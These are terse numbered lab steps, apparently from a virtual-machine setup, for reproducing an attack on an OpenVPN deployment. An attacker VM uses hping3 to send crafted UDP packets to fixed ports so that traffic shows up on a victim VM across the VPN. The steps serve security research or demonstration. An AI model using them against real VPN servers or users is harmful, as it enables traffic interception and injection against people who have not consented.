on server:

1. sudo echo "client-config-dir ccd" >> /etc/openvpn/server.conf
2. sudo mkdir /etc/openvpn/ccd
3. sudo echo "ifconfig-push 10.8.0.6 255.255.255.0" > ChangeMe

On attacker,

4. sudo /vagrant/namespaced-openvpn --config /vagrant/client2.ovpn &
Let it connect.
5. sudo ip netns exec protected sudo -u $USER -i
6. sudo hping3 -2  -s 56666 -k -p 56666 192.168.3.254
^C
7. sudo killall openvpn
^C

On Victim, Be fast
8. /vagrant/port_scan.sh
It should connect to vpn, open namespace and launch tcpdump. If not, just do that.

On webdnsserver, Speed pls

9. sudo hping3 -2  -s 56666 -k -p 56666 192.168.2.254

10. Give it a second and you should see traffic on the victim side
